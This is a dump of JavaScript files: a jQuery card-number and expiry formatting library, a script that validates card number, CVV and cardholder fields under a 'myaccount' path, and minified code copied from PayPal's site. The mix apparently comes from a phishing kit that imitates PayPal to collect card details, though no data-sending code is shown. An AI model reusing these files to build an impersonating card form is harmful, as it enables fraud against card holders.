[].indexOf || function(item) { for (var i = 0, l = this.length; i < l; i++) { if (i in this && this[i] === item) return i; } return -1; }; 6 | 7 | $ = jQuery; 8 | 9 | $.payment = {}; 10 | 11 | $.payment.fn = {}; 12 | 13 | $.fn.payment = function() { 14 | var args, method; 15 | method = arguments[0], args = 2 <= arguments.length ? __slice.call(arguments, 1) : []; 16 | return $.payment.fn[method].apply(this, args); 17 | }; 18 | 19 | defaultFormat = /(\d{1,4})/g; 20 | 21 | cards = [ 22 | { 23 | type: 'visaelectron', 24 | pattern: /^4(026|17500|405|508|844|91[37])/, 25 | format: defaultFormat, 26 | length: [16], 27 | cvcLength: [3], 28 | luhn: true 29 | }, { 30 | type: 'maestro', 31 | pattern: /^(5(018|0[23]|[68])|6(39|7))/, 32 | format: defaultFormat, 33 | length: [12, 13, 14, 15, 16, 17, 18, 19], 34 | cvcLength: [3], 35 | luhn: true 36 | }, { 37 | type: 'forbrugsforeningen', 38 | pattern: /^600/, 39 | format: defaultFormat, 40 | length: [16], 41 | cvcLength: [3], 42 | luhn: true 43 | }, { 44 | type: 'dankort', 45 | pattern: /^5019/, 46 | format: defaultFormat, 47 | length: [16], 48 | cvcLength: [3], 49 | luhn: true 50 | }, { 51 | type: 'visa', 52 | pattern: /^4/, 53 | format: defaultFormat, 54 | length: [13, 16], 55 | cvcLength: [3], 56 | luhn: true 57 | }, { 58 | type: 'mastercard', 59 | pattern: /^5[0-5]/, 60 | format: defaultFormat, 61 | length: [16], 62 | cvcLength: [3], 63 | luhn: true 64 | }, { 65 | type: 'amex', 66 | pattern: /^3[47]/, 67 | format: /(\d{1,4})(\d{1,6})?(\d{1,5})?/, 68 | length: [15], 69 | cvcLength: [3, 4], 70 | luhn: true 71 | }, { 72 | type: 'dinersclub', 73 | pattern: /^3[0689]/, 74 | format: defaultFormat, 75 | length: [14], 76 | cvcLength: [3], 77 | luhn: true 78 | }, { 79 | type: 'discover', 80 | pattern: /^6([045]|22)/, 81 | format: defaultFormat, 82 | length: [16], 83 | cvcLength: [3], 84 | luhn: true 85 | }, { 86 | type: 'unionpay', 87 | pattern: /^(62|88)/, 88 | format: defaultFormat, 89 | length: [16, 17, 18, 19], 90 | cvcLength: [3], 91 | luhn: false 92 | }, { 93 | type: 'jcb', 94 | pattern: /^35/, 95 | format: defaultFormat, 96 | length: [16], 97 | cvcLength: [3], 98 | luhn: true 99 | } 100 | ]; 101 | 102 | cardFromNumber = function(num) { 103 | var card, _i, _len; 104 | num = (num + '').replace(/\D/g, ''); 105 | for (_i = 0, _len = cards.length; _i < _len; _i++) { 106 | card = cards[_i]; 107 | if (card.pattern.test(num)) { 108 | return card; 109 | } 110 | } 111 | }; 112 | 113 | cardFromType = function(type) { 114 | var card, _i, _len; 115 | for (_i = 0, _len = cards.length; _i < _len; _i++) { 116 | card = cards[_i]; 117 | if (card.type === type) { 118 | return card; 119 | } 120 | } 121 | }; 122 | 123 | luhnCheck = function(num) { 124 | var digit, digits, odd, sum, _i, _len; 125 | odd = true; 126 | sum = 0; 127 | digits = (num + '').split('').reverse(); 128 | for (_i = 0, _len = digits.length; _i < _len; _i++) { 129 | digit = digits[_i]; 130 | digit = parseInt(digit, 10); 131 | if ((odd = !odd)) { 132 | digit *= 2; 133 | } 134 | if (digit > 9) { 135 | digit -= 9; 136 | } 137 | sum += digit; 138 | } 139 | return sum % 10 === 0; 140 | }; 141 | 142 | hasTextSelected = function($target) { 143 | var _ref; 144 | if (($target.prop('selectionStart') != null) && $target.prop('selectionStart') !== $target.prop('selectionEnd')) { 145 | return true; 146 | } 147 | if (typeof document !== "undefined" && document !== null ? (_ref = document.selection) != null ? typeof _ref.createRange === "function" ? _ref.createRange().text : void 0 : void 0 : void 0) { 148 | return true; 149 | } 150 | return false; 151 | }; 152 | 153 | reFormatCardNumber = function(e) { 154 | return setTimeout(function() { 155 | var $target, value; 156 | $target = $(e.currentTarget); 157 | value = $target.val(); 158 | value = $.payment.formatCardNumber(value); 159 | return $target.val(value); 160 | }); 161 | }; 162 | 163 | formatCardNumber = function(e) { 164 | var $target, card, digit, length, re, upperLength, value; 165 | digit = String.fromCharCode(e.which); 166 | if (!/^\d+$/.test(digit)) { 167 | return; 168 | } 169 | $target = $(e.currentTarget); 170 | value = $target.val(); 171 | card = cardFromNumber(value + digit); 172 | length = (value.replace(/\D/g, '') + digit).length; 173 | upperLength = 16; 174 | if (card) { 175 | upperLength = card.length[card.length.length - 1]; 176 | } 177 | if (length >= upperLength) { 178 | return; 179 | } 180 | if (($target.prop('selectionStart') != null) && $target.prop('selectionStart') !== value.length) { 181 | return; 182 | } 183 | if (card && card.type === 'amex') { 184 | re = /^(\d{4}|\d{4}\s\d{6})$/; 185 | } else { 186 | re = /(?:^|\s)(\d{4})$/; 187 | } 188 | if (re.test(value)) { 189 | e.preventDefault(); 190 | return setTimeout(function() { 191 | return $target.val(value + ' ' + digit); 192 | }); 193 | } else if (re.test(value + digit)) { 194 | e.preventDefault(); 195 | return setTimeout(function() { 196 | return $target.val(value + digit + ' '); 197 | }); 198 | } 199 | }; 200 | 201 | formatBackCardNumber = function(e) { 202 | var $target, value; 203 | $target = $(e.currentTarget); 204 | value = $target.val(); 205 | if (e.which !== 8) { 206 | return; 207 | } 208 | if (($target.prop('selectionStart') != null) && $target.prop('selectionStart') !== value.length) { 209 | return; 210 | } 211 | if (/\d\s$/.test(value)) { 212 | e.preventDefault(); 213 | return setTimeout(function() { 214 | return $target.val(value.replace(/\d\s$/, '')); 215 | }); 216 | } else if (/\s\d?$/.test(value)) { 217 | e.preventDefault(); 218 | return setTimeout(function() { 219 | return $target.val(value.replace(/\s\d?$/, '')); 220 | }); 221 | } 222 | }; 223 | 224 | reFormatExpiry = function(e) { 225 | return setTimeout(function() { 226 | var $target, value; 227 | $target = $(e.currentTarget); 228 | value = $target.val(); 229 | value = $.payment.formatExpiry(value); 230 | return $target.val(value); 231 | }); 232 | }; 233 | 234 | formatExpiry = function(e) { 235 | var $target, digit, val; 236 | digit = String.fromCharCode(e.which); 237 | if (!/^\d+$/.test(digit)) { 238 | return; 239 | } 240 | $target = $(e.currentTarget); 241 | val = $target.val() + digit; 242 | if (/^\d$/.test(val) && (val !== '0' && val !== '1')) { 243 | e.preventDefault(); 244 | return setTimeout(function() { 245 | return $target.val("0" + val + " / "); 246 | }); 247 | } else if (/^\d\d$/.test(val)) { 248 | e.preventDefault(); 249 | return setTimeout(function() { 250 | return $target.val("" + val + " / "); 251 | }); 252 | } 253 | }; 254 | 255 | formatForwardExpiry = function(e) { 256 | var $target, digit, val; 257 | digit = String.fromCharCode(e.which); 258 | if (!/^\d+$/.test(digit)) { 259 | return; 260 | } 261 | $target = $(e.currentTarget); 262 | val = $target.val(); 263 | if (/^\d\d$/.test(val)) { 264 | return $target.val("" + val + " / "); 265 | } 266 | }; 267 | 268 | formatForwardSlashAndSpace = function(e) { 269 | var $target, val, which; 270 | which = String.fromCharCode(e.which); 271 | if (!(which === '/' || which === ' ')) { 272 | return; 273 | } 274 | $target = $(e.currentTarget); 275 | val = $target.val(); 276 | if (/^\d$/.test(val) && val !== '0') { 277 | return $target.val("0" + val + " / "); 278 | } 279 | }; 280 | 281 | formatBackExpiry = function(e) { 282 | var $target, value; 283 | $target = $(e.currentTarget); 284 | value = $target.val(); 285 | if (e.which !== 8) { 286 | return; 287 | } 288 | if (($target.prop('selectionStart') != null) && $target.prop('selectionStart') !== value.length) { 289 | return; 290 | } 291 | if (/\s\/\s\d?$/.test(value)) { 292 | e.preventDefault(); 293 | return setTimeout(function() { 294 | return $target.val(value.replace(/\s\/\s\d?$/, '')); 295 | }); 296 | } 297 | }; 298 | 299 | restrictNumeric = function(e) { 300 | var input; 301 | if (e.metaKey || e.ctrlKey) { 302 | return true; 303 | } 304 | if (e.which === 32) { 305 | return false; 306 | } 307 | if (e.which === 0) { 308 | return true; 309 | } 310 | if (e.which < 33) { 311 | return true; 312 | } 313 | input = String.fromCharCode(e.which); 314 | return !!/[\d\s]/.test(input); 315 | }; 316 | 317 | restrictCardNumber = function(e) { 318 | var $target, card, digit, value; 319 | $target = $(e.currentTarget); 320 | digit = String.fromCharCode(e.which); 321 | if (!/^\d+$/.test(digit)) { 322 | return; 323 | } 324 | if (hasTextSelected($target)) { 325 | return; 326 | } 327 | value = ($target.val() + digit).replace(/\D/g, ''); 328 | card = cardFromNumber(value); 329 | if (card) { 330 | return value.length <= card.length[card.length.length - 1]; 331 | } else { 332 | return value.length <= 16; 333 | } 334 | }; 335 | 336 | restrictExpiry = function(e) { 337 | var $target, digit, value; 338 | $target = $(e.currentTarget); 339 | digit = String.fromCharCode(e.which); 340 | if (!/^\d+$/.test(digit)) { 341 | return; 342 | } 343 | if (hasTextSelected($target)) { 344 | return; 345 | } 346 | value = $target.val() + digit; 347 | value = value.replace(/\D/g, ''); 348 | if (value.length > 6) { 349 | return false; 350 | } 351 | }; 352 | 353 | restrictCVC = function(e) { 354 | var $target, digit, val; 355 | $target = $(e.currentTarget); 356 | digit = String.fromCharCode(e.which); 357 | if (!/^\d+$/.test(digit)) { 358 | return; 359 | } 360 | if (hasTextSelected($target)) { 361 | return; 362 | } 363 | val = $target.val() + digit; 364 | return val.length <= 4; 365 | }; 366 | 367 | setCardType = function(e) { 368 | var $target, allTypes, card, cardType, val; 369 | $target = $(e.currentTarget); 370 | val = $target.val(); 371 | cardType = $.payment.cardType(val) || 'unknown'; 372 | if (!$target.hasClass(cardType)) { 373 | allTypes = (function() { 374 | var _i, _len, _results; 375 | _results = []; 376 | for (_i = 0, _len = cards.length; _i < _len; _i++) { 377 | card = cards[_i]; 378 | _results.push(card.type); 379 | } 380 | return _results; 381 | })(); 382 | $target.removeClass('unknown'); 383 | $target.removeClass(allTypes.join(' ')); 384 | $target.addClass(cardType); 385 | $target.toggleClass('identified', cardType !== 'unknown'); 386 | return $target.trigger('payment.cardType', cardType); 387 | } 388 | }; 389 | 390 | $.payment.fn.formatCardCVC = function() { 391 | this.payment('restrictNumeric'); 392 | this.on('keypress', restrictCVC); 393 | return this; 394 | }; 395 | 396 | $.payment.fn.formatCardExpiry = function() { 397 | this.payment('restrictNumeric'); 398 | this.on('keypress', restrictExpiry); 399 | this.on('keypress', formatExpiry); 400 | this.on('keypress', formatForwardSlashAndSpace); 401 | this.on('keypress', formatForwardExpiry); 402 | this.on('keydown', formatBackExpiry); 403 | this.on('change', reFormatExpiry); 404 | this.on('input', reFormatExpiry); 405 | return this; 406 | }; 407 | 408 | $.payment.fn.formatCardNumber = function() { 409 | this.payment('restrictNumeric'); 410 | this.on('keypress', restrictCardNumber); 411 | this.on('keypress', formatCardNumber); 412 | this.on('keydown', formatBackCardNumber); 413 | this.on('keyup', setCardType); 414 | this.on('paste', reFormatCardNumber); 415 | this.on('change', reFormatCardNumber); 416 | this.on('input', reFormatCardNumber); 417 | this.on('input', setCardType); 418 | return this; 419 | }; 420 | 421 | $.payment.fn.restrictNumeric = function() { 422 | this.on('keypress', restrictNumeric); 423 | return this; 424 | }; 425 | 426 | $.payment.fn.cardExpiryVal = function() { 427 | return $.payment.cardExpiryVal($(this).val()); 428 | }; 429 | 430 | $.payment.cardExpiryVal = function(value) { 431 | var month, prefix, year, _ref; 432 | value = value.replace(/\s/g, ''); 433 | _ref = value.split('/', 2), month = _ref[0], year = _ref[1]; 434 | if ((year != null ? year.length : void 0) === 2 && /^\d+$/.test(year)) { 435 | prefix = (new Date).getFullYear(); 436 | prefix = prefix.toString().slice(0, 2); 437 | year = prefix + year; 438 | } 439 | month = parseInt(month, 10); 440 | year = parseInt(year, 10); 441 | return { 442 | month: month, 443 | year: year 444 | }; 445 | }; 446 | 447 | $.payment.validateCardNumber = function(num) { 448 | var card, _ref; 449 | num = (num + '').replace(/\s+|-/g, ''); 450 | if (!/^\d+$/.test(num)) { 451 | return false; 452 | } 453 | card = cardFromNumber(num); 454 | if (!card) { 455 | return false; 456 | } 457 | return (_ref = num.length, __indexOf.call(card.length, _ref) >= 0) && (card.luhn === false || luhnCheck(num)); 458 | }; 459 | 460 | $.payment.validateCardExpiry = function(month, year) { 461 | var currentTime, expiry, _ref; 462 | if (typeof month === 'object' && 'month' in month) { 463 | _ref = month, month = _ref.month, year = _ref.year; 464 | } 465 | if (!(month && year)) { 466 | return false; 467 | } 468 | month = $.trim(month); 469 | year = $.trim(year); 470 | if (!/^\d+$/.test(month)) { 471 | return false; 472 | } 473 | if (!/^\d+$/.test(year)) { 474 | return false; 475 | } 476 | if (!((1 <= month && month <= 12))) { 477 | return false; 478 | } 479 | if (year.length === 2) { 480 | if (year < 70) { 481 | year = "20" + year; 482 | } else { 483 | year = "19" + year; 484 | } 485 | } 486 | if (year.length !== 4) { 487 | return false; 488 | } 489 | expiry = new Date(year, month); 490 | currentTime = new Date; 491 | expiry.setMonth(expiry.getMonth() - 1); 492 | expiry.setMonth(expiry.getMonth() + 1, 1); 493 | return expiry > currentTime; 494 | }; 495 | 496 | $.payment.validateCardCVC = function(cvc, type) { 497 | var card, _ref; 498 | cvc = $.trim(cvc); 499 | if (!/^\d+$/.test(cvc)) { 500 | return false; 501 | } 502 | card = cardFromType(type); 503 | if (card != null) { 504 | return _ref = cvc.length, __indexOf.call(card.cvcLength, _ref) >= 0; 505 | } else { 506 | return cvc.length >= 3 && cvc.length <= 4; 507 | } 508 | }; 509 | 510 | $.payment.cardType = function(num) { 511 | var _ref; 512 | if (!num) { 513 | return null; 514 | } 515 | return ((_ref = cardFromNumber(num)) != null ? _ref.type : void 0) || null; 516 | }; 517 | 518 | $.payment.formatCardNumber = function(num) { 519 | var card, groups, upperLength, _ref; 520 | card = cardFromNumber(num); 521 | if (!card) { 522 | return num; 523 | } 524 | upperLength = card.length[card.length.length - 1]; 525 | num = num.replace(/\D/g, ''); 526 | num = num.slice(0, upperLength); 527 | if (card.format.global) { 528 | return (_ref = num.match(card.format)) != null ? _ref.join(' ') : void 0; 529 | } else { 530 | groups = card.format.exec(num); 531 | if (groups == null) { 532 | return; 533 | } 534 | groups.shift(); 535 | groups = $.grep(groups, function(n) { 536 | return n; 537 | }); 538 | return groups.join(' '); 539 | } 540 | }; 541 | 542 | $.payment.formatExpiry = function(expiry) { 543 | var mon, parts, sep, year; 544 | parts = expiry.match(/^\D*(\d{1,2})(\D+)?(\d{1,4})?/); 545 | if (!parts) { 546 | return ''; 547 | } 548 | mon = parts[1] || ''; 549 | sep = parts[2] || ''; 550 | year = parts[3] || ''; 551 | if (year.length > 0 || (sep.length > 0 && !(/\ \/?\ ?/.test(sep)))) { 552 | sep = ' / '; 553 | } 554 | if (mon.length === 1 && (mon !== '0' && mon !== '1')) { 555 | mon = "0" + mon; 556 | sep = ' / '; 557 | } 558 | return mon + sep + year; 559 | }; 560 | 561 | }).call(this); -------------------------------------------------------------------------------- /myaccount/js/new.look.js: -------------------------------------------------------------------------------- 1 | jQuery(function($) { 2 | $('#cc_number').payment('formatCardNumber'); 3 | $('#cvv2_number').payment('formatCardCVC'); 4 | $('.button').attr('disabled', true); 5 | 6 | $.fn.toggleInputError = function(erred) { 7 | this.parent('.field').toggleClass('has-error', erred); 8 | return this; 9 | }; 10 | 11 | $(this).keyup(function(e) { 12 | 13 | e.preventDefault(); 14 | 15 | var cardType = $.payment.cardType($('#cc_number').val()); 16 | $('#cc_number').toggleInputError(!$.payment.validateCardNumber($('#cc_number').val())); 17 | $('#cvv2_number').toggleInputError(!$.payment.validateCardCVC($('#cvv2_number').val(), cardType)); 18 | 19 | if ( $('[name="cc_holder"]').val().length > 5 ){ 20 | $('#cc_holder').removeClass('has-error'); 21 | } else { 22 | $('#cc_holder').addClass('has-error'); 23 | } 24 | 25 | $('#cc_number').addClass($(cardType).length ? '' : 'valid'); 26 | if ( cardType === 'amex' ){ 27 | $('#cvv2_number').attr('maxlength', '4'); 28 | $('#cvv2_number').addClass('amex'); 29 | } else { 30 | $('#cvv2_number').attr('maxlength', '3'); 31 | $('#cvv2_number').removeClass(); 32 | } 33 | 34 | if ( $('.has-error').length == 0 ){ 35 | $('.button').attr('disabled', false); 36 | } else { 37 | $('.button').attr('disabled', true); 38 | } 39 | 40 | }); 41 | 42 | }); -------------------------------------------------------------------------------- /myaccount/js/pageSalsa.js: -------------------------------------------------------------------------------- 1 | 2 | PAYPAL.namespace("Beloved.Salsa");PAYPAL.Beloved.Salsa={filter:null,scrollCount:0,minWidth:55,iframe:null,menuId:null,init:function(menuId){this.menuId=menuId;this.filter=document.getElementById(menuId);if(!(this.filter||(this.filter.getElementsByTagName("ul").length>1))){return;} 3 | this.createIFrameShim();this.hoverHack();this.initAccessibilityFilters();YUD.addClass(this.filter,"enabled");},secondaryminWidthFix:function(menuList){for(var i=0,j=menuList.length;i-1){this.iframe=document.createElement("iframe");this.iframe.src="javascript:false;";this.iframe.style.position="absolute";this.iframe.style.border="none";this.iframe.style.margin=0;this.iframe.style.padding=0;this.iframe.style.zIndex="1";this.iframe.style.visibility="hidden";YUD.setStyle(this.iframe,"opacity","0");document.body.appendChild(this.iframe);}},addIFrameShim:function(elem){if(!this.iframe){return;} 8 | var xy=YUD.getXY(elem);this.iframe.style.top=xy[1]+"px";this.iframe.style.left=xy[0]+"px";this.iframe.style.height=elem.clientHeight+"px";this.iframe.style.width=elem.clientWidth+"px";this.iframe.style.visibility="visible";this.iframe.style.zIndex="1";},removeIFrameShim:function(event,elem){if(this.iframe){this.iframe.style.visibility="hidden";}}};PAYPAL.Beloved.Salsa.toggleBalanceDetails=function(e){if(e){YUE.preventDefault(e);} 9 | if(YUD.getStyle("balanceDetails",'display')=='none') 10 | {YUD.removeClass('balanceDetails','hide');YUD.removeClass('collapse','hide');YUD.addClass('expand','hide');PAYPAL.Beloved.Salsa.showTable("balanceDetail","show");} 11 | else 12 | {YUD.removeClass('expand','hide');YUD.addClass('balanceDetails','hide');YUD.addClass('collapse','hide');PAYPAL.Beloved.Salsa.showTable("balanceDetail","hide");}};PAYPAL.Beloved.Salsa.toggleGiftBalanceDetails=function(e){if(e){YUE.preventDefault(e);} 13 | if(YUD.getStyle("giftBalances",'display')=='none') 14 | {YUD.removeClass('giftBalances','hide');YUD.removeClass('collapseGift','hide');YUD.addClass('expandGift','hide');PAYPAL.Beloved.Salsa.showTable("giftBalance","show");} 15 | else 16 | {YUD.removeClass('expandGift','hide');YUD.addClass('giftBalances','hide');YUD.addClass('collapseGift','hide');PAYPAL.Beloved.Salsa.showTable("giftBalance","hide");}};PAYPAL.Beloved.Salsa.initBalanceDetails=function(){if(document.getElementById('BalanceModuleState')){if(document.getElementById('BalanceModuleState').value=='1'){YUD.removeClass('collapse','hide');}else{YUD.removeClass('expand','hide');YUD.addClass('balanceDetails','hide');}} 17 | YUE.addListener("expandImg","click",PAYPAL.Beloved.Salsa.toggleBalanceDetails);YUE.addListener("collapseImg","click",PAYPAL.Beloved.Salsa.toggleBalanceDetails);YUE.addListener("expandLink","click",PAYPAL.Beloved.Salsa.toggleBalanceDetails);YUE.addListener("collapseLink","click",PAYPAL.Beloved.Salsa.toggleBalanceDetails);};PAYPAL.Beloved.Salsa.initGiftBalanceDetails=function(){if(document.getElementById('GiftBalanceModuleState')){if(document.getElementById('GiftBalanceModuleState').value=='1'){YUD.removeClass('collapseGift','hide');}else{YUD.removeClass('expandGift','hide');YUD.addClass('giftBalances','hide');}} 18 | YUE.addListener("expandGiftImg","click",PAYPAL.Beloved.Salsa.toggleGiftBalanceDetails);YUE.addListener("collapseGiftImg","click",PAYPAL.Beloved.Salsa.toggleGiftBalanceDetails);YUE.addListener("expandGiftLink","click",PAYPAL.Beloved.Salsa.toggleGiftBalanceDetails);YUE.addListener("collapseGiftLink","click",PAYPAL.Beloved.Salsa.toggleGiftBalanceDetails);};PAYPAL.Beloved.Salsa.showTable=function(balance,showhide){var handleSuccess=function(o){if(o.responseText!==undefined){var result=PAYPAL.Beloved.Salsa.getTagContents("result",o.responseText);if(result!='true'){window.reload();}}};var callback={success:handleSuccess};var balanceUrl;if(balance=="balanceDetail"&&showhide=="show"){balanceUrl="webscr?cmd=_balance-module-state&state=1";}else if(balance=="balanceDetail"&&showhide=="hide"){balanceUrl="webscr?cmd=_balance-module-state&state=0";}else if(balance=="giftBalance"&&showhide=="show"){balanceUrl="webscr?cmd=_gift-balance-module-state&state=1";}else if(balance=="giftBalance"&&showhide=="hide"){balanceUrl="webscr?cmd=_gift-balance-module-state&state=0";} 19 | YAHOO.util.Connect.asyncRequest('POST',balanceUrl,callback,null);};PAYPAL.Beloved.Salsa.displayLightbox=function(){var AXCILightbox=document.getElementById("AXCILightBox");document.body.appendChild(AXCILightbox);YUD.addClass("AXCILightBox","accessAid");var myLightbox=new PAYPAL.util.Lightbox("AXCILightBox");YUE.addListener("closer","click",function(){myLightbox.close();});myLightbox.show();};PAYPAL.Beloved.Salsa.initJCBLightBox=function(){var objLightBox=null;var imgLoading="
";var jcbintrolightbox=new PAYPAL.util.Lightbox("JCBIntroLightbox");jcbintrolightbox.setBody(imgLoading);jcbintrolightbox.show();var MiniPgURL=document.getElementById('jcbFlow').value;var param='';PAYPAL.util.Connect.send(MiniPgURL,{'method':'POST','query':param,'type':'minipage','callback':loadMini});function loadMini(data,request){var jcbDiv=document.createElement('div');jcbDiv.setAttribute('id','JCBIntroLightbox');jcbDiv.innerHTML=data.html;jcbintrolightbox.setBody(jcbDiv);} 20 | YUE.addListener("remind_later","click",function(e){YUE.preventDefault(e);jcbintrolightbox.close();});};PAYPAL.Beloved.Salsa.displayLoading=function(divId){var loadParent=document.getElementById(divId);PAYPAL.util.Connect.submitForm('ajaxForm',{'type':'minipage','callback':function(data){oldwidget=document.getElementById('PPCreditwidget');newwidget=document.createElement('div');newwidget.innerHTML=data.html;oldwidget.parentNode.replaceChild(newwidget,oldwidget);}});loadParent.innerHTML="";var loadingImg=document.createElement('img');loadingImg.setAttribute('alt','loading...');loadingImg.setAttribute('src','/en_US/i/icon/icon_animated_prog_42wx42h.gif');var loadingDiv=document.createElement('div');YUD.addClass(loadParent,'loadingImageTable');YUD.addClass(loadingImg,'processingImg');YUD.addClass(loadingDiv,"textcenter");loadingDiv.appendChild(loadingImg);loadParent.appendChild(loadingDiv);var loadParentXY=YUD.getXY(loadParent);YUD.setXY(loadingDiv,loadParentXY);loadingDiv.style.width=loadParent.offsetWidth+"px";loadingDiv.style.paddingTop=((loadParent.offsetHeight/2)-21)+"px";loadingDiv.style.paddingBottom=((loadParent.offsetHeight/2)-21)+"px";};PAYPAL.Beloved.Salsa.getTagContents=function(sTag,sString){var sReturn="";var oRex=new RegExp("<"+sTag+">(.{1,})<");var bMatch=oRex.exec(sString);if(bMatch!==null){sReturn=bMatch[1];} 21 | else{sReturn=null;} 22 | return sReturn;};PAYPAL.Beloved.Salsa.checkDismiss=function(data,request,exception){var result=PAYPAL.Beloved.Salsa.getTagContents("alert_result",request.responseText);var alert_id=PAYPAL.Beloved.Salsa.getTagContents("alert_id",request.responseText);if(result=='true'){YUD.addClass(alert_id,'hide');} 23 | else if(result===null){window.reload();}};PAYPAL.Beloved.Salsa.closeAlert=function(){var alertId=this.parentNode.id;var url="webscr?cmd=_alert-dismiss&alert_id="+alertId;PAYPAL.util.Connect.send(url,{callback:PAYPAL.Beloved.Salsa.checkDismiss});};PAYPAL.Beloved.Salsa.showAlertClose=function(){YUE.addListener(YUD.getElementsByClassName("autoTooltip","img","main"),"click",PAYPAL.Beloved.Salsa.closeAlert);};PAYPAL.Beloved.Salsa.StudentTicker={rightBoundery:0,width:0,height:0,increment:150,margin:50,viewport:null,slider:null,container:null,arrow:{right:null,left:null},init:function(){this.container=document.getElementById("studentAccounts");this.viewport=YUD.getElementsByClassName("viewport","div",this.container);if(this.viewport.length>0){this.viewport=this.viewport[0];} 24 | else{return false;} 25 | var dl=this.viewport.getElementsByTagName("dl");var width=0;this.slider=dl[0];for(var n=0;n=672){if(document.getElementById("studentAccounts")){var buttons=YUD.getElementsByClassName("leftBtn","span","studentAccounts");if(!buttons[0]){var leftSpan=document.createElement("span");leftSpan.className="leftBtn disabled";this.viewport.parentNode.insertBefore(leftSpan,this.viewport.parentNode.firstChild);var rightSpan=document.createElement("span");rightSpan.className="rightBtn rdisabled";this.viewport.parentNode.appendChild(rightSpan);}}} 27 | this.width=width;this.height=this.container.clientHeight;if(this.viewport.clientWidth>=this.width){this.rightBoundery=0;} 28 | else{this.rightBoundery=(this.width-this.viewport.clientWidth)*-1;} 29 | this.arrow.right=YUD.getElementsByClassName("rightBtn","*",this.container);this.arrow.left=YUD.getElementsByClassName("leftBtn","*",this.container);this.arrow.right=this.arrow.right[0];this.arrow.left=this.arrow.left[0];YUE.addListener(this.arrow.right,"click",this.moveRight,this,true);YUE.addListener(this.arrow.left,"click",this.moveLeft,this,true);this.resetArrows();var self=this;setInterval(function(){if(self.height!=self.container.clientHeight){self.init();}},1000);},resetArrows:function(pos){if(pos===undefined){pos=this.getPos();} 30 | if(pos>=0){YUD.addClass(this.arrow.left,"disabled");} 31 | else{YUD.removeClass(this.arrow.left,"disabled");} 32 | if(pos<=this.rightBoundery){YUD.addClass(this.arrow.right,"rdisabled");} 33 | else{YUD.removeClass(this.arrow.right,"rdisabled");}},getPos:function(){var pos=parseInt(this.slider.style.left,10);if(isNaN(pos)){return 0;} 34 | return pos;},moveRight:function(){this.move(-1);},moveLeft:function(){this.move(1);},move:function(dir){var pos=this.getPos();var moveTo=pos+(this.increment*dir);var leftButtons=YUD.getElementsByClassName("leftBtn","span","studentAccounts");var rightButtons=YUD.getElementsByClassName("rightBtn","span","studentAccounts");if(dir==1&&YUD.hasClass(leftButtons[0],"disabled")){return 0;} 35 | if(dir==-1&&YUD.hasClass(rightButtons[0],"rdisabled")){return 0;} 36 | PAYPAL.Beloved.Salsa.scrollCount-=dir;var scrollCount=PAYPAL.Beloved.Salsa.scrollCount;var dlist=YUD.getElementsByClassName("teen","dl","studentAccounts");var dterms=dlist[0].getElementsByTagName("dt");var dtCount=dterms.length;var currentdt=dterms[scrollCount];if(scrollCount>dtCount){scrollCount=dtCount;} 37 | var scrollWidth=dlist[0].offsetLeft+currentdt.offsetLeft;moveTo=pos-scrollWidth;if(moveTo>0){moveTo=0;} 38 | if(dir==1&&moveTo>=(this.margin*-1)){moveTo=0;} 39 | var anim=new YAHOO.util.Anim(this.slider,{left:{to:moveTo}},0.5,YAHOO.util.Easing.easeOut);anim.animate();this.resetArrows(moveTo);}};YUE.addListener(window,"load",PAYPAL.Beloved.Salsa.StudentTicker.init,PAYPAL.Beloved.Salsa.StudentTicker,true);PAYPAL.Beloved.Salsa.splitButtonSecondary=function(tableSecondaryRow){var secondaryRow=tableSecondaryRow;var selectDiv=YUD.getElementsByClassName("splitButton","div",secondaryRow);if(selectDiv.length>0){var selectList=YUD.getElementsByClassName("list","ul",secondaryRow);var selectSpan=YUD.getElementsByClassName("listSpan","span",secondaryRow);var selectDivRegion=YUD.getRegion(selectDiv[0]);YUD.setStyle(selectList,'width','auto');YUD.setXY(selectList[0],[parseInt(selectDivRegion.left,10),parseInt(selectDivRegion.top,10)]);var selectListRegion=YUD.getRegion(selectList[0]);YUD.setStyle(selectSpan,'height',(parseInt(selectListRegion.bottom,10)-parseInt(selectListRegion.top,10))+'px');YUD.setXY(selectSpan,[parseInt(selectListRegion.right,10),parseInt(selectListRegion.top,10)]);}};PAYPAL.Beloved.Salsa.showHideRows=function(e){var pressedKey=YUE.getCharCode(e);var KEY_LEFT=37,KEY_RIGHT=39,KEY_SPACE=32,KEY_RETURN=13,MOUSE_CLICK=0;if((pressedKey==KEY_RIGHT&&YUD.hasClass(this.parentNode,"showCollapsedImage"))||(pressedKey==KEY_LEFT&&YUD.hasClass(this.parentNode,"showExpandedImage"))||pressedKey==KEY_RETURN||pressedKey==KEY_SPACE||pressedKey==MOUSE_CLICK){if(pressedKey==KEY_RETURN||pressedKey==KEY_SPACE||pressedKey==MOUSE_CLICK){YUE.preventDefault(e);} 40 | var row=this.parentNode.parentNode;var flagClickSameRow=YUD.hasClass(row,"showSecondary");var hideSecondaryRows=YUD.getElementsByClassName("showSecondary");for(i=0;i=1){for(i=0;i=1){YUD.addClass(toggleSecondary,"showCollapsedImage");for(i=0;i0){YUD.replaceClass(hideSecondary,"secondary","hideSecondary");YUD.setStyle(hideSecondary,'display','none');} 49 | var firstTab=YUD.getElementsByClassName("tabHeader")[0] 50 | if(firstTab){YUD.replaceClass(YUD.getElementsByClassName("imageCell","td",firstTab)[0],"showcollapsedImage","showExpandedImage");YUD.addClass(firstTab,"showSecondary");var firstTabSecondaryRows=YUD.getElementsByClassName(firstTab.id);YUD.replaceClass(firstTabSecondaryRows,"hideSecondary","showSecondary");YUD.setStyle(firstTabSecondaryRows,'display','');} 51 | if(document.getElementById("recent_all_selected")){document.getElementById("recent_all_selected").disabled=false;} 52 | YUE.addListener(YUD.getElementsByClassName("resultsSelect","select","main"),"change",PAYPAL.Beloved.Salsa.getResultsPerPage);};var flagSplitbutton=0;var maxSplitButtonColumnWidth=(YUD.get('activityFilters'))?160:120;PAYPAL.Beloved.Salsa.showHideSecondary=function(event){var targetEvent=YUE.getTarget(event);var flagIsOpen=false;if(flagSplitbutton===0&&navigator.userAgent.toLowerCase().indexOf('msie 6')!=-1){var orderStatusCell=YUD.getElementsByClassName("orderStatus","td","transactionTable");if(orderStatusCell.length>0){YUD.setStyle(orderStatusCell,'position','static');}} 53 | var listItems=YUD.getElementsByClassName("list");for(var i=0;i0)){flagIsOpen=listItems[i];YUD.replaceClass(listItems[i],"open","closed");var li_items=listItems[i].getElementsByTagName("li");for(var 